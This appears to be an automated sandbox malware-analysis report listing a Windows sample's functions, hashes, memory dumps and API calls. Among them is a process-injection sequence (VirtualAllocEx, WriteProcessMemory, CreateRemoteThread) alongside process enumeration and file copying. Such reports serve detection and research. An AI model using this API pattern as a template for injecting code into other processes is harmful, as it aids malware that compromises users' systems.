Opcode ID: ab13f9e72ad61b44d361f7659d51cba00134b3904c54f324f193f33ceb966efc
Instruction ID: f6e4d2e07a8044f39b22373700a9b9ba63e0bf01a7a74d56644dd5a42bba7a9d
Opcode Fuzzy Hash: ab13f9e72ad61b44d361f7659d51cba00134b3904c54f324f193f33ceb966efc
Instruction Fuzzy Hash: 4411CC752083136ED77266F9ACC4EAF6AC8BF11BA97940178F5D4DE091DB958C048250

Function 0101BA20 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0101BB71

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction ID: c44299e98c1e181df525dfa44056d5dab0340b28c8901b1753b6669436cab377
Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction Fuzzy Hash: 3A411172A001099BCB15EF6CDD806AEBBB5FF44251F1402A9E885EB249D774EE108BE1

Function 0108CD02 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00FB1FDE

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 2544863b7403e42cd3b34f733f50a0597c57725032d590facefbe7b3a80da620
Instruction ID: b947c1a34733b7967ae3447e5a3989ebc376a4b906d70897331d82f68e013c26
Opcode Fuzzy Hash: 2544863b7403e42cd3b34f733f50a0597c57725032d590facefbe7b3a80da620
Instruction Fuzzy Hash: A701D63580430EA7DB14BFA9EC009DA7BAC9F11260B908626F6D4AA550FB70E59086A1

Function 010A3E63 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0108B16C,?), ref: 010A3EA4

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dda46b82600f89233012f6048b0b422ad656bfbdb61598148c1ad9231912e459
Instruction ID: 53eae20955620b4b089bfcc6880338385048d181d2ba6d755aba5e5321423606
Opcode Fuzzy Hash: dda46b82600f89233012f6048b0b422ad656bfbdb61598148c1ad9231912e459
Instruction Fuzzy Hash: 94F0543260022667AB72AEF69C05B9BBB89BF41760B45C551AFC4DE1C0CB70E80486E4

Function 010A489D Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 010A48CF

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 676fc5fa32e3c86cb1da34a30fadf6e69f6b0f47ea96ad6acfe36bdaba9945f4
Instruction ID: 0f17ce9d31bf94a3f89c5549c1f72fc28605db8a5709ae198a07a7bcdfca5f90
Opcode Fuzzy Hash: 676fc5fa32e3c86cb1da34a30fadf6e69f6b0f47ea96ad6acfe36bdaba9945f4
Instruction Fuzzy Hash: 3AE0653950129656FB6126EAAC1479F3AC8DF416A1F8D0261EDC4E75D0DBE5D810C2A1

Non-executed Functions

Function 00FBA720 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 324libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?), ref: 00FBA7CD
GetProcAddress.KERNEL32(00000000,?), ref: 00FBA7DD
GetModuleHandleA.KERNEL32(?), ref: 00FBA845
GetProcAddress.KERNEL32(00000000,?), ref: 00FBA84C
OpenProcess.KERNEL32(00000040,00000000,?), ref: 00FBA858
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000), ref: 00FBA8D1
CloseHandle.KERNEL32(?), ref: 00FBA908
CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00FBA98D
ResetEvent.KERNEL32(00000000), ref: 00FBA996
CreateThread.KERNEL32(00000000,00000000,00FBA5B0,?,00000000,00000000), ref: 00FBA9BA
WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00FBA9C6
RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 00FBAA0C
CloseHandle.KERNEL32(?), ref: 00FBAA4A
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000001), ref: 00FBAA56
CloseHandle.KERNEL32(?), ref: 00FBAA71
CloseHandle.KERNEL32(00000000), ref: 00FBAAD5

Strings

File, xrefs: 00FBA93C

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: Handle$Close$Process$AddressCreateCurrentEventModuleProcString$AnsiObjectOpenResetSingleThreadUnicodeWait
String ID: File
API String ID: 3800441322-749574446
Opcode ID: ec483ff7726f62fa3e3a53ccf388188ad054b2139dd5b5cd673b17414c1c87b0
Instruction ID: 23e999fd490bef1a51e74000be161610e593c9442a59545cf49d1abe15878d9d
Opcode Fuzzy Hash: ec483ff7726f62fa3e3a53ccf388188ad054b2139dd5b5cd673b17414c1c87b0
Instruction Fuzzy Hash: AAC1CE70D00248EBEF11CFA4DD85BEEBBB9EF15300F140069E945AB291E775A944DFA2

Function 00FCA100 Relevance: 23.3, APIs: 8, Strings: 4, Instructions: 2291injectionmemorysynchronizationCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00FCA16A
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00FCA186
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00FCA1BF
VirtualAllocEx.KERNEL32(?,00000000,00001000,00003000,00000040), ref: 00FCA1E9
WriteProcessMemory.KERNEL32(?,?,?,00000218,00000000), ref: 00FCA368
WriteProcessMemory.KERNEL32(?,?,00FC9FE0,00000110,00000000), ref: 00FCA388
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 00FCA39B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00FCA3A4

Strings

type must be boolean, but is , xrefs: 00FCC171, 00FCC1A2, 00FCC265
%s|%s, xrefs: 00FCA347
50500, xrefs: 00FCA2A5
131, xrefs: 00FCA32B, 00FCA33B

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: MemoryProcessWrite$AllocVirtual$CreateObjectRemoteSingleThreadWait
String ID: %s|%s$131$50500$type must be boolean, but is
API String ID: 2137838514-353184664
Opcode ID: a83b50cd18a1e8396902d5e7981a5ad13bb5b689f7477443fc30629becc4bcbb
Instruction ID: e3f7547a75d381d7a345d8701f9efeeb24cf388a6fa4421296c66ed0cf78686e
Opcode Fuzzy Hash: a83b50cd18a1e8396902d5e7981a5ad13bb5b689f7477443fc30629becc4bcbb
Instruction Fuzzy Hash: 44231170D0025A8FDB29DF68CA5ABEDBBB0AF15304F1481DCD449AB292D7359E84DF90

Function 0103BBB0 Relevance: 18.5, APIs: 3, Strings: 7, Instructions: 970COMMON

Download Yara Rule

Strings

+Inf, xrefs: 0103C416
NaN, xrefs: 0103C319
Inf, xrefs: 0103C41F
, xrefs: 0103C475, 0103C49E, 0103C4F2, 0103C517
+, xrefs: 0103C260
-Inf, xrefs: 0103C40F
gfff, xrefs: 0103C7BD

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID: $+$+Inf$-Inf$Inf$NaN$gfff
API String ID: 0-2577472133
Opcode ID: 02ebe34f1d9f11e00c3d01dd3801fce969caef18421b11d9cb40413c1e25f149
Instruction ID: 9ae9b2c126064c5cacce8df409d832681f2a611382b3a94e3c46f9059991a254
Opcode Fuzzy Hash: 02ebe34f1d9f11e00c3d01dd3801fce969caef18421b11d9cb40413c1e25f149
Instruction Fuzzy Hash: A182A0719087818FE726CF2CC55036BBBE9AFDA344F048A5EE8C9EB251D731D9458B42

Function 0108B41B Relevance: 15.2, APIs: 10, Instructions: 200fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0108B4B3
GetLastError.KERNEL32(?,?), ref: 0108B4BD
FindFirstFileW.KERNEL32(?,?,?,?), ref: 0108B4D4
GetLastError.KERNEL32(?,?), ref: 0108B4DF
FindClose.KERNEL32(00000000,?,?), ref: 0108B4EB
___std_fs_open_handle@16.LIBCPMT ref: 0108B5A4

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
String ID:
API String ID: 2340820627-0
Opcode ID: 214db01cf8efa2b5a4cf540414de4f5877bff231e373008514d394324f56c90d
Instruction ID: fe833c3395b50606768ac96463df6d6d2c0f737bd8f9153c5436105f1d954737
Opcode Fuzzy Hash: 214db01cf8efa2b5a4cf540414de4f5877bff231e373008514d394324f56c90d
Instruction Fuzzy Hash: DB71A274A046199FEBA0DF6CC884BAEB7F8BF09314F0442A5E9D5E3390DB749950CB50

Function 0108A800 Relevance: 9.2, Strings: 7, Instructions: 490COMMON

Download Yara Rule

Strings

automatic extension loading failed: %s, xrefs: 0108AD13
sqlite_rename_table, xrefs: 0108ABA7
BINARY, xrefs: 0108AA32, 0108AA41, 0108AA5B, 0108AA9D
MATCH, xrefs: 0108ABCB, 0108ABD9, 0108ABF9, 0108ABFA, 0108AC10
NOCASE, xrefs: 0108AAB4
no such vfs: %s, xrefs: 0108AA11
RTRIM, xrefs: 0108AA75

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID:
String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
API String ID: 0-1885142750
Opcode ID: de26d0bcfc31b70d1bf161fe9e6984c5583a95101e89636aff8431d630c29a59
Instruction ID: 8d3f743fd82346fc34dc6862d1acfb1a704634ae0a3df64317d26202a6bfb759
Opcode Fuzzy Hash: de26d0bcfc31b70d1bf161fe9e6984c5583a95101e89636aff8431d630c29a59
Instruction Fuzzy Hash: 710215B0B04701DBE730AF29D845B6A7BE5BF50B04F04446EE5C69FA81E7BAE544CB81

Function 010ADEC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,010AE1D6,?,?), ref: 010ADF5D
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,010AE1D6,?,?), ref: 010ADF86
GetACP.KERNEL32(?,?,010AE1D6,?,?), ref: 010ADF9B

Strings

OCP, xrefs: 010ADF18
ACP, xrefs: 010ADEE2

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 66c7ff13b031d64c8ec0ed2631c2acc3c591627d493c914b465d1c6b0a5c538e
Instruction ID: 31e16256fd2ca432c01d5580e1991b319b1fdbb722981c6820a394bbf46dc337
Opcode Fuzzy Hash: 66c7ff13b031d64c8ec0ed2631c2acc3c591627d493c914b465d1c6b0a5c538e
Instruction Fuzzy Hash: 9721C572600100EAEB719FD8C940BDB77EEEF40A50BC644A4EACAD7915E732DD40C750

Function 00FBAB50 Relevance: 8.6, APIs: 5, Instructions: 1081processCOMMON

Download Yara Rule

APIs

Part of subcall function 00FBA400: GetModuleHandleA.KERNEL32(?,?,?), ref: 00FBA478
Part of subcall function 00FBA400: GetProcAddress.KERNEL32(00000000,?), ref: 00FBA483
Part of subcall function 00FBA400: GetProcessHeap.KERNEL32(?,?), ref: 00FBA490
Part of subcall function 00FBA400: RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 00FBA4A6
Part of subcall function 00FBA400: RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 00FBA4DC

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FBAC0E
Process32First.KERNEL32(00000000,?), ref: 00FBAC1E
Process32Next.KERNEL32(00000000,?), ref: 00FBAC3B
Process32Next.KERNEL32(00000000,?), ref: 00FBAD6A
CloseHandle.KERNEL32(00000000), ref: 00FBAD7F

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd

Yara matches

Similarity

API ID: HeapProcess32$AllocateHandleNext$AddressCloseCreateFirstModuleProcProcessSnapshotToolhelp32
String ID:
API String ID: 4286562329-0
Opcode ID: bcdf8ad49e9b56b88ca520ae1b0b80f3d806d3ac4fa615f546a92603bf3eb013
Instruction ID: c5356a4800762410226ee9a714590deef93af1ffa39cec7b3786dfd50ffc4cb3
Opcode Fuzzy Hash: bcdf8ad49e9b56b88ca520ae1b0b80f3d806d3ac4fa615f546a92603bf3eb013
Instruction Fuzzy Hash: 00923431D002488FDF19CFA8C8947FEBB75EF56310F288299D4956B282DB709A46DF91

Function 00FC42A0 Relevance: 8.2, APIs: 5, Instructions: 669fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,00000000), ref: 00FC478E
__Mtx_unlock.LIBCPMT ref: 00FC489B

Part of subcall function 00FBAB50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FBAC0E
Part of subcall function 00FBAB50: Process32First.KERNEL32(00000000,?), ref: 00FBAC1E
Part of subcall function 00FBAB50: Process32Next.KERNEL32(00000000,?), ref: 00FBAC3B

CopyFileA.KERNEL32(?,?,00000000), ref: 00FC47AE
__Mtx_unlock.LIBCPMT ref: 00FC49A1
__Mtx_unlock.LIBCPMT ref: 00FC4A6C

Memory Dump Source

Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

